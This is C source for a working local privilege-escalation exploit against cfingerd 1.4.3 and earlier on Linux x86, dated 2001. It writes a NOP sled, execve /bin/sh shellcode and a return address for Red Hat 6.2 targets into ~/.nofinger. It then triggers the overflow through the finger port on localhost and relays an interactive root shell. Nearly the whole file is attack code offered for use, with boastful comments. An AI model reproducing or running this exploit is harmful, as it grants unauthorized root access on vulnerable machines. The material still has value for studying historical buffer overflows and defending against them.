/*

 * cfingerd 1.4.3 and prior Linux x86 local root exploit

 * by qitest1 10/07/2001

 *

 * This code successfully exploits the bof vulnerability found by

 * Steven Van Acker <deepstar@ulyssis.org> and recently posted to

 * bugtraq. If the ALLOW_LINE_PARSING option is set, and it is set

 * by default, the bof simply occurs when reading the ~/.nofinger

 * file. If cfingerd is called by inetd as root, a root shell will be

 * spawned. But it is quite funny that the authors of cfingerd in the

 * README almost seem to encourage people to set inetd.conf for

 * calling cfingerd as root.     

 *

 * Greets: my friends on #sikurezza@Undernet

 *            jtripper: hi man, play_the_game with me! =)

 *            warson and warex

 *

 * Fuck:   fender'/hcezar: I want your respect..

 *

 * have fun with this 0x69 local toy! =) 

 */

 

#include <stdio.h>

#include <pwd.h>

#include <sys/types.h>

#include <unistd.h>

#include <netinet/in.h>

#include <netdb.h>

 

#define            RETPOS                     84

#define LOCALHOST "localhost"

#define            FINGERD_PORT       79

 

  struct targ

    {

      int                  def;

      char                 *descr;

      u_long          retaddr;

    };

 

  struct targ target[]=

    {                   

      {0, "Red Hat 6.2 with cfingerd 1.4.0 from tar.gz", 0xbffff660},

      {1, "Red Hat 6.2 with cfingerd 1.4.1 from tar.gz", 0xbffff661},

      {2, "Red Hat 6.2 with cfingerd 1.4.2 from tar.gz", 0xbffff662},

      {3, "Red Hat 6.2 with cfingerd 1.4.3 from tar.gz", 0xbffff663},

      {69, NULL, 0}

    };

 

  char shellcode[] =                             /* Aleph1 code */

  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

 

  int    sel = 0, offset = 0;

 

  void   play_the_game(u_long retaddr, struct passwd *user);

  int      sockami(char *host, int port);

  void   shellami(int sock);

  void  usage(char *progname);

  

int

main(int argc, char **argv)

{

  int                              sock, cnt;

  uid_t                 euid;

  char                           sbuf[256];

  struct passwd            *user;

 

  printf("\n  cfingerd 1.4.3 and prior exploit by qitest1\n\n");

 

  while((cnt = getopt(argc,argv,"t:o:h")) != EOF)

    {

   switch(cnt)

        {

   case 't':

     sel = atoi(optarg);

     break;

   case 'o':

     offset = atoi(optarg);

     break;

   case 'h':

     usage(argv[0]);

     break;

        }

    }

 

  euid = geteuid();

  user = (struct passwd *)getpwuid(euid);

 

  printf("+User: %s\n  against: %s\n", user->pw_name, target[sel].descr);

  target[sel].retaddr += offset;

  printf("+Using: retaddr = %p...\n  ok\n", target[sel].retaddr);

 

  play_the_game(target[sel].retaddr, user);

 

  sock = sockami(LOCALHOST, FINGERD_PORT);

  sprintf(sbuf, "%s\n", user->pw_name);

  send(sock, sbuf, strlen(sbuf), 0);

 

  printf("+Waiting for a shell...\n  0x69 =)\n");

  sleep(1);

  shellami(sock);  

}

 

void

play_the_game(u_long retaddr, struct passwd *user)

{

  char                           zbuf[256], nofinger_path[256];

  int                              i, n = 0; 

  FILE                          *nofinger_file;

 

  memset(zbuf, '\x90', sizeof(zbuf));

  for(i = RETPOS - strlen(shellcode); i < RETPOS; i++)

        zbuf[i] = shellcode[n++];

  

  zbuf[RETPOS + 0] = (u_char) (retaddr & 0x000000ff);

  zbuf[RETPOS + 1] = (u_char)((retaddr & 0x0000ff00) >> 8);

  zbuf[RETPOS + 2] = (u_char)((retaddr & 0x00ff0000) >> 16);

  zbuf[RETPOS + 3] = (u_char)((retaddr & 0xff000000) >> 24);

  zbuf[RETPOS + 4] = '\x00';

 

  sprintf(nofinger_path, "%s/.nofinger", user->pw_dir);

  nofinger_file = fopen(nofinger_path, "w");

  printf("+Writing ~/.nofinger...\n");

  fprintf(nofinger_file, "$%s\n", zbuf);

  printf("  done\n");

  fclose(nofinger_file);

 

  return;

}

 

int

sockami(char *host, int port)

{

struct sockaddr_in address;

struct hostent *hp;

int sock;

 

  sock = socket(AF_INET, SOCK_STREAM, 0);

  if(sock == -1)

        {

          perror("socket()");

          exit(-1);

        }

 

  hp = gethostbyname(host);

  if(hp == NULL)

        {

          perror("gethostbyname()");

          exit(-1);

        }

 

  memset(&address, 0, sizeof(address));

  memcpy((char *) &address.sin_addr, hp->h_addr, hp->h_length);

  address.sin_family = AF_INET;

  address.sin_port = htons(port);

 

  if(connect(sock, (struct sockaddr *) &address, sizeof(address)) == -1)

        {

          perror("connect()");

          exit(-1);

        }

 

  return(sock);

}

 

 

void

shellami(int sock)

{

  int             n;

  char            recvbuf[1024], *cmd = "id; uname -a\n";

  fd_set          rset;

 

  send(sock, cmd, strlen(cmd), 0);

 

  while (1)

    {

      FD_ZERO(&rset);

      FD_SET(sock, &rset);

      FD_SET(STDIN_FILENO, &rset);

      select(sock+1, &rset, NULL, NULL, NULL);

      if(FD_ISSET(sock, &rset))

        {

          n = read(sock, recvbuf, 1024);

          if (n <= 0)

            {

              printf("Connection closed by foreign host.\n");

              exit(0);

            }

          recvbuf[n] = 0;

          printf("%s", recvbuf);

        }

      if (FD_ISSET(STDIN_FILENO, &rset))

        {

          n = read(STDIN_FILENO, recvbuf, 1024);

          if (n > 0)

            {

              recvbuf[n] = 0;

              write(sock, recvbuf, n);

            }

        }

    }

  return;

}

 

void

usage(char *progname)

{

  int  i = 0;

  

  printf("Usage: %s [options]\n", progname);

  printf("Options:\n"

         "  -t target\n"

         "  -o offset\n"

             "  -h (help)\n"

         "Available targets:\n");

  while(target[i].def != 69)

        { 

          printf("  %d) %s\n", target[i].def, target[i].descr);

          i++;

        } 

 

  exit(1);

}